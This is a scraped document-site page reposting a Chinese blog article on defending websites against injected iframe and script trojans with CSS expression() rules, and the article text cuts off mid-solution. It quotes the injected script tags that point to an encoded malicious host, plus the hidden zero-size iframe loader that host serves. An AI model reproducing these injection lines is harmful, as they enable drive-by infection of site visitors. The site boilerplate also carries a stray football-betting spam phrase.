- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
二行代码解决全部网页木马
二行代码解决全部网页木马(含iframe/script木马)
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。
前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂script木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:
注意,以下地址含有木马,请不要轻易访问:script src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/script汗死,一连插入了N个一样的script标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:document.write(div style=display:none)document.write(iframe src=/b1.htm?id=017 width=0 height=0/iframe)document.write(/div)又用迅雷下载/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!...var Kfqq, Qqs=784378237; qwfgsg=LLLL//XXXXXLD; Kfqq = Qqs;(...略)(下面还有N个统计的JS代码)。针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,script木马的特点是什么:script src=http://%76%63%63%64%2E%63%6E/script对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他object代码,不管这么多,来多少杀多少。
来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:iframe{n1ifm:expression(this.src=about:blank,this.outerHTML=);}/*这行代码是解决挂IFRAME木马的哦*/script{nojs1:expression((this.src.toLowerCase().indexOf(http)==0)?document.write(木马被成功隔离!):);}原理:将script标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。 缺点:访客无法看到被感染了script木马的页面。
解决方案2:iframe{nifm2:expression(this.src=about:blank,this.outerHTML=);}script{no2js:expression((this.src.toLowerCase().indexOf(http)==0)?document.close():);}原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
解决方案3:iframe{ni3fm:expression(this.src=about:blank,this.outerHTML=);}script{n3ojs:expression((this.src.toLowerCase().indexOf(http)==0
您可能关注的文档
最近下载
- 屋顶分布式光伏发电项目 投标方案(技术方案).doc
- 道法开学第一课(二年级).pptx VIP
- 电业安全工作规程热力和机械部分但g义b261641—2010.doc VIP
- (高清版)B 26164.1-2010 电业安全工作规程 第1部分:热力和机械.pdf VIP
- 水利工程监理资料目录.xls VIP
- 国企混改项目商业计划书.docx VIP
- CityGML全部实体类型总结(中英文对照).docx VIP
- JT_T 1432.1 2022 公路工程土工合成材料 第1部分:土工格栅.pdf VIP
- 2020年全国普通高等学校体育单招真题英语试卷(原卷+解析).docx VIP
- 2025年全国普通高等学校体育单招真题英语试卷完整版 .pdf VIP
文档评论(0)